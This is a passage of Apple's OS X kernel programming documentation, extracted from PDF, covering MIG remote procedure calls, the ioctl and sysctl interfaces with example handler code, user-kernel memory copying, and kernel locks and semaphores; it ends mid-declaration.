Messaging and Mach Interprocess Communication (IPC) 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 114In the function itself, the function checks the count parameter to verify that the buffer size is at least the size of the data to be returned to prevent exceeding array bounds. The function changes the value stored in count to be the desired size and returns an error if the buffer is not large enough (unless the buffer pointer is null, in which case it returns success). Otherwise, it dereferences the various fields of the policy_info parameter and in so doing, stores appropriate values into it, then returns. Note: Since Mach RPC is done via message passing, inout parameters are technically call-by-value-return and not call-by-reference. For more realistic call-by-reference, you need to pass a pointer. The distinction is not particularly significant except when aliasing occurs. (Aliasing means having a single variable visible in the same scope under two or more different names.) In addition to the routine, Mach RPC also has a simpleroutine. A simpleroutine is a routine that is, by definition, asynchronous. It can have no out or inout parameters and no return value. The caller does not wait for the function to return. One possible use for this might be to tell an I/O device to send data as soon as it is ready. In that use, the simpleroutine might simply wait for data, then send a message to the calling task to indicate the availability of data. Another important feature of MIG is that of the subsystem. In MIG, a subsystem is a group of routines and simpleroutines that are related in some way. For example, the semaphore subsystem contains related routinesthat operate on semaphores. There are also subsystemsfor varioustimers, parts of the virtual memory (VM) system, and dozens of others in various places throughout the kernel. Most of the time, if you need to use RPC, you will be doing it within an existing subsystem. The details of creating a new subsystem are beyond the scope of this document. Developers needing to add a new Mach subsystem should consult the Mach 3 ServerWriter’s Guide from The Open Group (TOG), which can be obtained from various locations on the internet. Another feature of MIG is the type. A type in MIG is exactly the same thing as it is in programming languages. However, the construction of aggregate types differs somewhat. type clock_flavor_t = int; type clock_attr_t = array[*:1] of int; type mach_timespec_t = struct[2] of int; Data of type array is passed as the user-space address of what is assumed to be a contiguous array of the base type, while a struct is passed by copying all of the individual values of an array of the base type. Otherwise, these are treated similarly. A “struct” is not like a C struct, as elements of a MIG struct must all be of the same base type. Boundary Crossings Mach Messaging and Mach Interprocess Communication (IPC) 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 115The declaration syntax issimilar to Pascal, where *:1 and 2 representsizesfor the array orstructure, respectively. The *:1 construct indicates a variable-sized array, where the size can be up to 1, inclusive, but no larger. Calling RPC From User Applications RPC, as mentioned previously, is virtually transparent to the client. The procedure call looks like any other C function call, and no additional library linkage is needed. You need only to bring the appropriate headers in with a #include directive. The compiler automatically recognizes the call as a remote procedure call and handles the underlying MIG aspects for you. BSD syscall API The syscall API is the traditional UNIX way of calling kernel functions from user space. Its implementation variesfrom one part of the kernel to the next, however, and it is completely unsupported for loadable modules. For this reason, it is not a recommended way of getting data into or out of the kernel in OS X unless you are writing a file system. File systems have to support a number of standard system calls (for example, mount), but do so by means of generic file system routinesthat call the appropriate file-system functions. Thus, if you are writing a file system, you need to implement those functions, but you do not need to write the code that handles the system calls directly. For more information on implementing syscall support in file systems,see the chapter “File Systems Overview” (page 106). BSD ioctl API The ioctl interface provides a way for an application to send certain commands or information to a device driver. These can be used for parameter tuning (though this is more commonly done with sysctl), but can also be used for sending instructions for the driver to perform a particular task (for example, rewinding a tape drive). The use of the ioctl interface is essentially the same under OS X as it is in other BSD-derived operating systems, except in the way that device drivers register themselves with the system. In OS X, unlike most BSDs, the contents of the /dev directory are created dynamically by the kernel. This file system mounted on /dev is referred to as devfs. You can, of course, still manually create device nodes with mknod, because devfs is union mounted over the root file system. Boundary Crossings BSD syscall API 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 116The I/O Kit automatically registers some types of devices with devfs, creating a node in /dev. If your device family does not do that, you can manually register yourself in devfs using cdevsw_add or bdevsw_add (for character and block devices, respectively). When registering a device manually with devfs, you create a struct cdevsw or struct bdevsw yourself. In that device structure, one of the function pointers is to an ioctl function. You must define the particular values passed to the ioctl function in a header file accessible to the person compiling the application. A user application can also look up the device using the I/O Kit function call getMatchingServices and then use various I/O Kit calls to tune parameter instead. For more information on looking up a device driver from an application, see the document Accessing Hardware From Applications. You can also find additional information about writing an ioctl in The Design and Implementation of the 4.4 BSD Operating System. See the bibliography at the end of this document for more information. BSD sysctl API The system control (sysctl) API is specifically designed for kernel parameter tuning. This functionality supersedesthe syscall API, and also provides an easy way to tune simple kernel parameters without actually needing to write a handler routine in the kernel. The sysctl namespace is divided into several broad categories corresponding to the purpose of the parameters in it. Some of these areas include ● kern—general kernel parameters ● vm—virtual memory options ● fs—filesystem options ● machdep—machine dependent settings ● net—network stack settings ● debug—debugging settings ● hw—hardware parameters (generally read-only) ● user—parameters affecting user programs ● ddb—kernel debugger Most of the time, programs use the sysctl call to retrieve the current value of a kernel parameter. For example, in OS X, the hw sysctl group includesthe option ncpu, which returnsthe number of processorsin the current computer (or the maximum number of processors supported by the kernel on that particular computer, whichever is less). Boundary Crossings BSD sysctl API 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 117The sysctl API can also be used to modify parameters (though most parameters can only be changed by the root). For example, in the net hierarchy, net.inet.ip.forwarding can be set to 1 or 0, to indicate whether the computer should forward packets between multiple interfaces (basic routing). General Information on Adding a sysctl When adding a sysctl, you must do all of the following first: ● add the following includes: #include #include #include #include ● add -no-cpp-precomp to your compiler options in Project Builder (or to CFLAGS in your makefile if building by hand). Adding a sysctl Procedure Call Adding a system control (sysctl) was once a daunting task requiring changes to dozens of files. With the current implementation, a system control can be added simply by writing the appropriate handler functions and then registering the handler with the system at runtime. The old-style sysctl, which used fixed numbers for each control, is deprecated. Note: Because this is largely a construct of the BSD subsystem, all path names in this section can be assumed to be from /path/to/xnu-version/bsd/. Also, you may safely assume that all program code snippets should go into the main source file for your subsystem or module unless otherwise noted, and that in the case of modules, function calls should be made from your start or stop routines unless otherwise noted. The preferred way of adding a sysctl looks something like the following: SYSCTL_PROC(_hw, OID_AUTO, l2cr, CTLTYPE_INT|CTLFLAG_RW, &L2CR, 0, &sysctl_l2cr, "I", "L2 Cache Register"); Boundary Crossings BSD sysctl API 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 118The _PROC part indicates that you are registering a procedure to provide the value (as opposed to simply reading from a static address in kernel memory). _hw is the top level category (in this case, hardware), and OID_AUTO indicates that you should be assigned the next available control ID in that category (as opposed to the old-style, fixed ID controls). l2cr is the name of your control, which will be used by applications to look up the number of your control using sysctlbyname. Note: Not all top level categories will necessarily accept the addition of a user-specified new-style sysctl. If you run into problems, you should try a different top-level category. CTLTYPE_INT indicates that the value being changed is an integer. Other legal values are CTLTYPE_NODE, CTLTYPE_STRING, CTLTYPE_QUAD, and CTLTYPE_OPAQUE (also known as CTLTYPE_STRUCT). CTLTYPE_NODE isthe only one that isn’tsomewhat obvious. It refersto a node in the sysctl hierarchy that isn’t directly usable, but instead is a parent to other entries. Two examples of nodes are hw and kern. CTLFLAG_RW indicatesthat the value can be read and written.Other legal values are CTLFLAG_RD, CTLFLAG_WR, CTLFLAG_ANYBODY, and CTLFLAG_SECURE. CTLFLAG_ANYBODY means that the value should be modifiable by anybody. (The default is for variables to be changeable only by root.) CTLFLAG_SECURE means that the variable can be changed only when running at securelevel <= 0 (effectively, in single-user mode). L2CR is the location where the sysctl will store its data. Since the address is set at compile time, however, this must be a global variable or a static local variable. In this case, L2CR is a global of type unsigned int. The number 0 is a second argument that is passed to your function. This can be used, for example, to identify which sysctl was used to call your handler function if the same handler function is used for more than one control. In the case of strings, this is used to store the maximum allowable length for incoming values. sysctl_l2cr is the handler function for this sysctl. The prototype for these functions is of the form static int sysctl_l2cr SYSCTL_HANDLER_ARGS; If the sysctl is writable, the function may either use sysctl_handle_int to obtain the value passed in from user space and store it in the default location or use the SYSCTL_IN macro to store it into an alternate buffer. This function must also use the SYSCTL_OUT macro to return a value to user space. "I" indicates that the argument should refer to a variable of type integer (or a constant, pointer, or other piece of data of equivalent width), as opposed to "L" for a long, "A" for a string, "N" for a node (a sysctl that is the parent of a sysctl category or subcategory), or "S" for a struct. "L2 Cache Register" is a human-readable description of your sysctl. In order for a control to be accessible from an application, it must be registered. To do this, you do the following: Boundary Crossings BSD sysctl API 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 119sysctl_register_oid(&sysctl__hw_l2cr); You should generally do this in an init routine for a loadable module. If your code is not part of a loadable module, you should add your sysctl to the list of built-in OIDs in the file kern/sysctl_init.c. If you study the SYSCTL_PROC constructor macro, you will notice that sysctl__hw_l2cr is the name of a variable created by that macro. This meansthat the SYSCTL_PROC line must be before sysctl_register_oid in the file, and must be in the same (or broader) scope. This name is in the form of sysctl_ followed by the name of it’s parent node, followed by another underscore ( _ ) followed by the name of your sysctl. A similar function, sysctl_unregister_oid exists to remove a sysctl from the registry. If you are writing a loadable module, you should be certain to do this when your module is unloaded. In addition to registering your handler function, you also have to write the function. The following is a typical example static int myhandler SYSCTL_HANDLER_ARGS { int error, retval; error = sysctl_handle_int(oidp, oidp->oid_arg1, oidp->oid_arg2, req); if (!error && req->newptr) { /* We have a new value stored in the standard location.*/ /* Do with it as you see fit here. */ printf("sysctl_test: stored %d\n", SCTEST); } else if (req->newptr) { /* Something was wrong with the write request */ /* Do something here if you feel like it.... */ } else { /* Read request. Always return 763, just for grins. */ printf("sysctl_test: read %d\n", SCTEST); retval=763; error=SYSCTL_OUT(req, &retval, sizeof retval); } /* In any case, return success or return the reason for failure */ return error; Boundary Crossings BSD sysctl API 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 120} This demonstrates the use of SYSCTL_OUT to send an arbitrary value out to user space from the sysctl handler. The “phantom” req argument is part of the function prototype when the SYSCTL_HANDLER_ARGS macro is expanded, as is the oidp variable used elsewhere. The remaining arguments are a pointer (type indifferent) and the length of data to copy (in bytes). This code sample also introduces a new function, sysctl_handle_int, which takes the arguments passed to the sysctl, and writes the integer into the usual storage area (L2CR in the earlier example, SCTEST in this one). If you want to see the new value without storing it (to do a sanity check, for example), you should instead use the SYSCTL_IN macro, whose arguments are the same as SYSCTL_OUT. Registering a New Top Level sysctl In addition to adding new sysctl options, you can also add a new category or subcategory. The macro SYSCTL_DECL can be used to declare a node that can have children. This requires modifying one additional file to create the child list. For example, if your main C file does this: SYSCTL_DECL(_net_newcat); SYSCTL_NODE(_net, OID_AUTO, newcat, CTLFLAG_RW, handler, "new category"); then this is basically the same thing as declaring extern sysctl_oid_list sysctl__net_newcat_children in your program. In order for the kernel to compile, or the module to link, you must then add this line: struct sysctl_oid_list sysctl__net_newcat_children; If you are not writing a module, this should go in the file kern/kern_newsysctl.c. Otherwise, it should go in one of the files of your module. Once you have created this variable, you can use _net_newcat as the parent when creating a new control. As with any sysctl, the node (sysctl__net_newcat) must be registered with sysctl_register_oid and can be unregistered with sysctl_unregister_oid. Boundary Crossings BSD sysctl API 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 121Note: When creating a top level sysctl, parent is simply left blank, for example, SYSCTL_NODE( , OID_AUTO, _topname, flags, handler_fn, "desc"); Adding a Simple sysctl If your sysctl only needsto read a value out of a variable, then you do not need to write a function to provide access to that variable. Instead, you can use one of the following macros: ● SYSCTL_INT(parent, nbr, name, access, ptr, val, descr) ● SYSCTL_LONG(parent, nbr, name, access, ptr, descr) ● SYSCTL_STRING(parent, nbr, name, access, arg, len, descr) ● SYSCTL_OPAQUE(parent, nbr, name, access, ptr, len, descr) ● SYSCTL_STRUCT(parent, nbr, name, access, arg, type, descr) The first four parameters for each macro are the same as for SYSCTL_PROC (described in the previous section) as is the last parameter. The len parameter (where applicable) gives a length of the string or opaque object in bytes. The arg parameters are pointersjust like the ptr parameters. However, the parameters named ptr are explicitly described as pointers because you must explicitly use the “address of” (&) operator unless you are already working with a pointer. Parameters called arg either operate on base types that are implicitly pointers or add the & operator in the appropriate place during macro expansion. In both cases, the argument should refer to the integer, character, or other object that the sysctl will use to store the current value. The type parameter is the name of the type minus the “struct”. For example, if you have an object of type struct scsipi, then you would use scsipi as that argument. The SYSCTL_STRUCT macro is functionally equivalent to SYSCTL_OPAQUE, except that it hides the use of sizeof. Finally, the val parameter for SYSCTL_INT is a default value. If the value passed in ptr is NULL, this value is returned when the sysctl is used. You can use this, for example, when adding a sysctl that is specific to certain hardware or certain compile options. One possible example of this might be a special value for feature.version that means “not present.” If that feature became available (for example, if a module were loaded by some user action), it could then update that pointer. If that module were subsequently unloaded, it could set the pointer back to NULL. Boundary Crossings BSD sysctl API 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 122Calling a sysctl From User Space Unlike RPC, sysctl requires explicit intervention on the part of the programmer. To complicate thingsfurther, there are two different ways of calling sysctl functions, and neither one worksfor every control. The old-style sysctl call can only invoke a control if it is listed in a static OID table in the kernel. The new-style sysctlbyname call will work for any user-added sysctl, but not for those listed in the static table. Occasionally, you will even find a control that isregistered in both ways, and thus available to both calls. In order to understand the distinction, you must first consider the functions used. The sysctlbyname System Call If you are calling a sysctl that was added using the new sysctl method (including any sysctl that you may have added), then your sysctl does not have a fixed number that identifies it, since it was added dynamically to the system. Since there is no approved way to get this number from user space, and since the underlying implementation is not guaranteed to remain the same in future releases, you cannot call a dynamically added control using the sysctl function. Instead, you must use sysctlbyname. sysctlbyname(char *name, void *oldp, size_t *oldlenp, void *newp, u_int newlen) The parameter name is the name of the sysctl, encoded as a standard C string. The parameter oldp is a pointer to a buffer where the old value will be stored. The oldlenp parameter is a pointer to an integer-sized buffer that holds the current size of the oldp buffer. If the oldp buffer is not large enough to hold the returned data, the call will fail with errno set to ENOMEM, and the value pointed to by oldlenp will be changed to indicate the buffer size needed for a future call to succeed. Here is an example for reading an integer, in this case a buffer size. int get_debug_bufsize() { char *name="debug.bpf_bufsize"; int bufsize, retval; size_t len; len=4; retval=sysctlbyname(name, &bufsize, &len, NULL, 0); /* Check retval here */ return bufsize; } Boundary Crossings BSD sysctl API 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 123The sysctl System Call The sysctlbyname system call is the recommended way to call system calls. However, not every built-in system control is registered in the kernel in such a way that it can be called with sysctlbyname. For this reason, you should also be aware of the sysctl system call. Note: If you are adding a sysctl, it will be accessible using sysctlbyname. You should use this system call only if the sysctl you need cannot be retrieved using sysctlbyname. In particular, you should not assume that future versions of sysctl will be backed by traditional numeric OIDs except for the existing legacy OIDs, which will be retained for compatibility reasons. The sysctl system call is part of the original historical BSD implementation of system controls. You should not depend on its use for any control that you might add to the system. The classic usage of sysctl looks like the following sysctl(int *name, u_int namelen, void *oldp, size_t *oldlenp, void *newp, u_int newlen) System controls, in this form, are based on the MIB, or Management Information Base architecture. A MIB is a list of objects and identifiers for those objects. Each object identifier, or OID, is a list of integers that represent a tokenization of a path through the sysctl tree. For example, if the hw class of sysctl is number 3, the first integer in the OID would be the number 3. If the l2cr option is built into the system and assigned the number 75, then the second integer in the OID would be 75. To put it another way, each number in the OID is an index into a node’s list of children. Here is a short example of a call to get the bus speed of the current computer: int get_bus_speed() { int mib[2], busspeed, retval; unsigned int miblen; size_t len; mib[0]=CTL_HW; mib[1]=HW_BUS_FREQ; miblen=2; len=4; retval=sysctl(mib, miblen, &busspeed, &len, NULL, 0); Boundary Crossings BSD sysctl API 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 124/* Check retval here */ return busspeed; } For more information on the sysctl system call, see the manual page sysctl. Memory Mapping and Block Copying Memory mapping is one of the more common means of communicating between two applications or between an application and the kernel. While occasionally used by itself, it is usually used in conjunction with one of the other means of boundary crossing. One way of using memory mapping is known as shared memory. In this form, one or more pages of memory are mapped into the address space of two processes. Either process can then access or modify the data stored in those shared pages. This is useful when moving large quantities of data between processes, as it allows direct communication without multiple user-kernel boundary crossings. Thus, when moving large amounts of data between processes, this is preferable to traditional message passing. The same holds true with memory mapping between an application and the kernel. The BSD sysctl and syscall interfaces (and to an extent, Mach IPC) were designed to transfer small units of data of known size, such as an array of four integers. In this regard, they are much like a traditional C function call. If you need to pass a large amount of data to a function in C, you should pass a pointer. This is also true when passing data between an application and the kernel, with the addition of memory mapping or copying to allow that pointer to be dereferenced in the kernel. There are a number of limitations to the way that memory mapping can be used to exchange data between an application and the kernel. For one, memory allocated in the kernel cannot be written to by applications, including those running as root (unless the kernel is running in an insecure mode, such as single user mode). For this reason, if a buffer must be modified by an application, the buffer must be allocated by that program, not by the kernel. When you use memory mapping for passing data to the kernel, the application allocates a block of memory and fillsit with data. It then performs a system call that passesthe addressto the appropriate function in kernel space. It should be noted, however, that the address being passed is a virtual address, not a physical address, and more importantly, it is relative to the address space of the program, which is not the same as the address space of the kernel. Since the address is a user-space virtual address, the kernel must call special functions to copy the block of memory into a kernel buffer or to map the block of memory into the kernel’s address space. Boundary Crossings Memory Mapping and Block Copying 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 125In the OS X kernel, data is most easily copied into kernel space with the BSD copyin function, and back out to user space with the copyout function. For large blocks of data, entire pages will be memory mapped using copy-on-write. For this reason, it is generally not useful to do memory mapping by hand. Getting data from the kernel to an application can be done in a number of ways. The most common method is the reverse of the above, in which the application passes in a buffer pointer, the kernel scribbles on a chunk of data, uses copyout to copy the buffer data into the address space of the application, and returns KERN_SUCCESS. Note that this is really using the buffer allocated in the application, even though the physical memory may have actually been allocated by the kernel. Assuming the kernel frees its reference to the buffer, no memory is wasted. A special case of memory mapping occurs when doing I/O to a device from user space. Since I/O operations can, in some cases, be performed by DMA hardware that operates based on physical addressing, it is vital that the memory associated with I/O buffers not be paged out while the hardware is copying data to or from the buffer. For this reason, when a driver or other kernel entity needs a buffer for I/O, it must take steps to mark it as not pageable. This step is referred to as wiring the pages in memory. Wiring pages into memory can also be helpful where high bandwidth, low latency communication is desired, as it prevents shared buffers from being paged out to disk. In general, however, this sort of workaround should be unnecessary, and is considered to be bad programming practice. Pages can be wired in two ways. When a memory region is allocated, it may be allocated in a nonpageable fashion. The details of allocating memory for I/O differ, depending on what part of the kernel you are modifying. This is described in more detail in the appropriate sections of this document, or in the case of the I/O Kit, in the API reference documentation (available from the developer section of Apple’s web site). Alternately, individual pages may be wired after allocation. The recommended way to do this is through a call to vm_wire in BSD parts of the kernel, with mlock from applications (but only by processes running as root), or with IOMemoryDescriptor::prepare in the I/O Kit. Because this can fail for a number of reasons, it is particularly crucial to check return values when wiring memory. The vm_wire call and other virtual memory topics are discussed in more detail in “Memory and Virtual Memory” (page 61). The IOMemoryDescriptor class is described in more detail in the I/O Kit API reference available from the developer section of Apple’s web site. Boundary Crossings Memory Mapping and Block Copying 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 126Summary Crossing the user-kernel boundary is not a trivial task. Many mechanisms exist for this communication, and each one has specific advantages and disadvantages, depending on the environment and bandwidth requirements. Security is a constant concern to prevent inadvertently allowing one program to access data or files from another program or user. It is every kernel programmer’s personal responsibility to take security into account any time that data crosses the user-kernel boundary. Boundary Crossings Summary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 127This chapter is not intended as an introduction to synchronization. It is assumed that you have some understanding of the basic concepts of locks and semaphores already. If you need additional background reading,synchronization is covered in most introductory operating systemstexts. However,since synchronization in the kernel is somewhat different from locking in an application this chapter does provide a brief overview to help ease the transition, or for experienced kernel developers, to refresh your memory. As an OS X kernel programmer, you have many choices of synchronization mechanisms at your disposal. The kernel itself provides two such mechanisms: locks and semaphores. A lock is used for basic protection of shared resources. Multiple threads can attempt to acquire a lock, but only one thread can actually hold it at any given time (at least for traditional locks—more on this later). While that thread holds the lock, the other threads must wait. There are several different types of locks, differing mainly in what threads do while waiting to acquire them. A semaphore is much like a lock, except that a finite number of threads can hold itsimultaneously. Semaphores can be thought of as being much like piles of tokens. Multiple threads can take these tokens, but when there are none left, a thread must wait until another thread returns one. It is important to note that semaphores can be implemented in many different ways,so Mach semaphores may not behave in the same way assemaphores on other platforms. In addition to locks and semaphores, certain low-level synchronization primitives like test and set are also available, along with a number of other atomic operations. These additional operations are described in libkern/gen/OSAtomicOperations.c in the kernelsources. Such atomic operations may be helpful if you do not need something asrobust as a full-fledged lock orsemaphore. Since they are not generalsynchronization mechanisms, however, they are beyond the scope of this chapter. Semaphores Semaphores and locks are similar, except that with semaphores, more than one thread can be doing a given operation at once. Semaphores are commonly used when protecting multiple indistinct resources. For example, you might use a semaphore to prevent a queue from overflowing its bounds. OS X uses traditional counting semaphores rather than binary semaphores (which are essentially locks). Mach semaphores obey Mesa semantics—that is, when a thread is awakened by a semaphore becoming available, it is not executed immediately. This presents the potential for starvation in multiprocessor situations when the 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 128 Synchronization Primitivessystem is under low overall load because other threads could keep downing the semaphore before the just-woken thread gets a chance to run. This is something that you should consider carefully when writing applications with semaphores. Semaphores can be used any place where mutexes can occur. This precludes their use in interrupt handlers or within the context of the scheduler, and makes it strongly discouraged in the VM system. The public API for semaphores is divided between the MIG–generated task.h file (located in your build output directory, included with #include ) and osfmk/mach/semaphore.h (included with #include ). The public semaphore API includes the following functions: kern_return_t semaphore_create(task_t task, semaphore_t *semaphore, int policy, int value) kern_return_t semaphore_signal(semaphore_t semaphore) kern_return_t semaphore_signal_all(semaphore_t semaphore) kern_return_t semaphore_wait(semaphore_t semaphore) kern_return_t semaphore_destroy(task_t task, semaphore_t semaphore) kern_return_t semaphore_signal_thread(semaphore_t semaphore, thread_act_t thread_act) which are described in or xnu/osfmk/mach/semaphore.h (except for create and destroy, which are described in . The use of these functions is relatively straightforward with the exception of the semaphore_create, semaphore_destroy, and semaphore_signal_thread calls. The value and semaphore parametersfor semaphore_create are exactly what you would expect—a pointer to the semaphore structure to be filled out and the initial value for the semaphore, respectively. The task parameter refers to the primary Mach task that will “own” the lock. This task should be the one that is ultimately responsible for the subsequent destruction of the semaphore. The task parameter used when calling semaphore_destroy must match the one used when it was created. For communication within the kernel, the task parameter should be the result of a call to current_task. For synchronization with a user process, you need to determine the underlying Mach task for that process by calling current_task on the kernel side and mach_task_self on the application side. task_t current_task(void); // returns the kernel task port task_t mach_task_self(void);// returns the task port of the current thread Synchronization Primitives Semaphores 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 129Note: In the kernel, be sure to always use current_task. In the kernel, mach_task_self returns a pointer to the kernel’s VM map, which is probably not what you want. The details of user-kernel synchronization are beyond the scope of this document. The policy parameter is passed asthe policy for the wait queue contained within the semaphore. The possible values are defined in osfmk/mach/sync_policy.h. Current possible values are: ● SYNC_POLICY_FIFO ● SYNC_POLICY_FIXED_PRIORITY ● SYNC_POLICY_PREPOST The FIFO policy is, asthe name suggests, first-in-first-out. The fixed priority policy causes wait queue reordering based on fixed thread priority policies. The prepost policy causes the semaphore_signal function to not increment the counter if no threads are waiting on the queue. This policy is needed for creating condition variables (where a thread is expected to always wait until signalled). See the section “Wait Queues and Wait Primitives” (page 87) for more information. The semaphore_signal_thread call takes a particular thread from the wait queue and places it back into one of the scheduler’s wait-queues, thus making that thread available to be scheduled for execution. If thread_act is NULL, the first thread in the queue is similarly made runnable. With the exception of semaphore_create and semaphore_destroy, these functions can also be called from user space via RPC. See “Calling RPC From User Applications” (page 116) for more information. Condition Variables The BSD portion of OS X provides msleep, wakeup, and wakeup_one, which are equivalent to condition variables with the addition of an optional time-out. You can find these functions in sys/proc.h in the Kernel framework headers. msleep(void *channel, lck_mtx_t *mtx, int priority, const char *wmesg, struct timespec *timeout); msleep0(vvoid *channel, lck_mtx_t *mtx, int priority, const char *wmesg, uint64_t deadline); wakeup(void *channel); wakeup_one(void *channel); Synchronization Primitives Condition Variables 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 130The msleep call is similar to a condition variable. It puts a thread to sleep until wakeup or wakeup_one is called on that channel. Unlike a condition variable, however, you can set a timeout measured in clock ticks. This means that it is both a synchronization call and a delay. The prototypes follow: msleep(void *channel, lck_mtx_t *mtx, int priority, const char *wmesg, struct timespec *timeout); msleep0(vvoid *channel, lck_mtx_t *mtx, int priority, const char *wmesg, uint64_t deadline); wakeup(void *channel); wakeup_one(void *channel); The three sleep calls are similar except in the mechanism used for timeouts. The function msleep0 is not recommended for general use. In these functions, channel is a unique identifier representing a single condition upon which you are waiting. Normally, when msleep is used, you are waiting for a change to occur in a data structure. In such cases, it is common to use the address of that data structure as the value for channel, as this ensures that no code elsewhere in the system will be using the same value. The priority argument has three effects. First, when wakeup is called, threads are inserted in the scheduling queue at this priority. Second, if the bit (priority & PCATCH) is set, msleep0 does not allow signals to interrupt the sleep. Third, if the bit (priority & PDROP) is zero, msleep0 drops the mutex on sleep and reacquires it upon waking. If (priority & PDROP) is one, msleep0 drops the mutex if it has to sleep, but does not reacquire it. The subsystem argument is a short text string that represents the subsystem that is waiting on this channel. This is used solely for debugging purposes. The timeout argument is used to set a maximum wait time. The thread may wake sooner, however, if wakeup or wakeup_one is called on the appropriate channel. It may also wake sooner if a signal isreceived, depending on the value of priority. In the case of msleep0, this is given as a mach abstime deadline. In the case of msleep, this is given in relative time (seconds and nanoseconds). Outside the BSD portion of the kernel, condition variables may be implemented using semaphores. Synchronization Primitives Condition Variables 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 131Locks OS X (and Mach in general) has three basic types of locks: spinlocks, mutexes, and read-write locks. Each of these has different uses and different problems. There are also many other types of locks that are not implemented in OS X, such as spin-sleep locks, some of which may be useful to implement for performance comparison purposes. Spinlocks A spinlock is the simplest type of lock. In a system with a test-and-set instruction or the equivalent, the code looks something like this: while (test_and_set(bit) != 0); In other words, until the lock is available, it simply “spins” in a tight loop that keeps checking the lock until the thread’s time quantum expires and the next thread begins to execute. Since the entire time quantum for the first thread must complete before the next thread can execute and (possibly) release the lock, a spinlock is very wasteful of CPU time, and should be used only in places where a mutex cannot be used, such as in a hardware exception handler or low-level interrupt handler. Note that a thread may not block while holding a spinlock, because that could cause deadlock. Further, preemption is disabled on a given processor while a spinlock is held. There are three basic types of spinlocks available in OS X: lck_spin_t (which supersedes simple_lock_t), usimple_lock_t, and hw_lock_t. You are strongly encouraged to not use hw_lock_t; it is only mentioned for the sake of completeness. Of these, only lck_spin_t is accessible from kernel extensions. The u in usimple stands for uniprocessor, because they are the only spinlocks that provide actual locking on uniprocessorsystems. Traditionalsimple locks, by contrast, disable preemption but do notspin on uniprocessor systems. Note that in most contexts, it is not useful to spin on a uniprocessor system, and thus you usually only need simple locks. Use of usimple locks is permissible for synchronization between thread context and interrupt context or between a uniprocessor and an intelligent device. However, in most cases, a mutex is a better choice. Important: Simple and usimple locks that could potentially be shared between interrupt context and thread context must have their use coordinated with spl (see glossary). The IPL (interrupt priority level) must always be the same when acquiring the lock, otherwise deadlock may result. (This is not an issue for kernel extensions, however, as the spl functions cannot be used there.) The spinlock functions accessible to kernel extensions consist of the following: Synchronization Primitives Locks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 132extern lck_spin_t *lck_spin_alloc_init( lck_grp_t *grp, lck_attr_t *attr); extern void lck_spin_init( lck_spin_t *lck, lck_grp_t *grp, lck_attr_t *attr); extern void lck_spin_lock( lck_spin_t *lck); extern void lck_spin_unlock( lck_spin_t *lck); extern void lck_spin_destroy( lck_spin_t *lck, lck_grp_t *grp); extern void lck_spin_free( lck_spin_t *lck, lck_grp_t *grp); extern wait_result_t lck_spin_sleep( lck_spin_t *lck, lck_sleep_action_t lck_sleep_action, event_t event, wait_interrupt_t interruptible); extern wait_result_t lck_spin_sleep_deadline( lck_spin_t *lck, lck_sleep_action_t lck_sleep_action, event_t event, wait_interrupt_t interruptible, uint64_t deadline); Synchronization Primitives Locks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 133Prototypes for these locks can be found in . The arguments to these functions are described in detail in “Using Lock Functions” (page 139). Mutexes A mutex, mutex lock, or sleep lock, is similar to a spinlock, except that instead of constantly polling, it places itself on a queue of threads waiting for the lock, then yields the remainder of its time quantum. It does not execute again until the thread holding the lock wakesit (or in some userspace variations, until an asynchronous signal arrives). Mutexes are more efficient than spinlocksfor most purposes. However, they are less efficient in multiprocessing environments where the expected lock-holding time is relatively short. If the average time is relatively short but occasionally long, spin/sleep locks may be a better choice. Although OS X does not support spin/sleep locksin the kernel, they can be easily implemented on top of existing locking primitives. If your code performance improves as a result of using such locks, however, you should probably look for ways to restructure your code, such as using more than one lock or moving to read-write locks, depending on the nature of the code in question. See “Spin/Sleep Locks” (page 138) for more information. Because mutexes are based on blocking, they can only be used in places where blocking is allowed. For this reason, mutexes cannot be used in the context of interrupt handlers. Interrupt handlers are not allowed to block because interrupts are disabled for the duration of an interrupt handler, and thus, if an interrupt handler blocked, it would prevent the scheduler from receiving timer interrupts, which would prevent any other thread from executing, resulting in deadlock. For a similar reason, it is not reasonable to block within the scheduler. Also, blocking within the VM system can easily lead to deadlock if the lock you are waiting for is held by a task that is paged out. However, unlike simple locks, it is permissible to block while holding a mutex. This would occur, for example, if you took one lock, then tried to take another, but the second lock was being held by another thread. However, this is generally not recommended unless you carefully scrutinize all uses of that mutex for possible circular waits, as it can result in deadlock. You can avoid this by always taking locks in a certain order. In general, blocking while holding a mutex specific to your code isfine aslong as you wrote your code correctly, but blocking while holding a more global mutex is probably not, since you may not be able to guarantee that other developers’ code obeys the same ordering rules. A Mach mutex is of type mutex_t. The functions that operate on mutexes include: lck_mtx_t *lck_mtx_alloc_init(lck_grp_t *grp, lck_attr_t *attr); extern void lck_mtx_init( lck_mtx_t *lck, Synchronization Primitives Locks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 134lck_grp_t *grp, lck_attr_t *attr); extern void lck_mtx_lock( lck_mtx_t *lck); extern void lck_mtx_unlock( lck_mtx_t *lck); extern void lck_mtx_destroy(lck_mtx_t *lck, lck_grp_t *grp); extern void lck_mtx_free( lck_mtx_t *lck, lck_grp_t *grp); extern wait_result_tlck_mtx_sleep( lck_mtx_t *lck, lck_sleep_action_t lck_sleep_action, event_t event, wait_interrupt_t interruptible); extern 